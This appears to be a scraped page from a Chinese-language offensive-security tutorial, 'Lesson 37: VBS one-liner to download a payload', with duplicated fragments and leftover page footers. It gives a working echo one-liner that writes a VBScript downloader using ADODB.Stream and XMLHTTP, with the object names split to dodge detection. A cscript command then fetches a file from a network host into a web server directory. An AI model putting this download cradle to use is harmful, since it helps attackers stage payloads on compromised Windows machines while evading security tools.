第三十七课:vbs一句话下载payload
vbs:
### 命令行下执行:
```bash
cscript downfile.vbs http://192.168.1.115/robots.txt C:\Inetpub\b.txt
命令行下执行:
Last updated
Was this helpful?
### 命令行下执行:
```bash
cscript downfile.vbs http://192.168.1.115/robots.txt C:\Inetpub\b.txt
Last updated
Was this helpful?
Was this helpful?
echo set a=createobject(^"adod^"+^"b.stream^"):set
w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile
wsh.arguments(1),2 >>downfile.vbs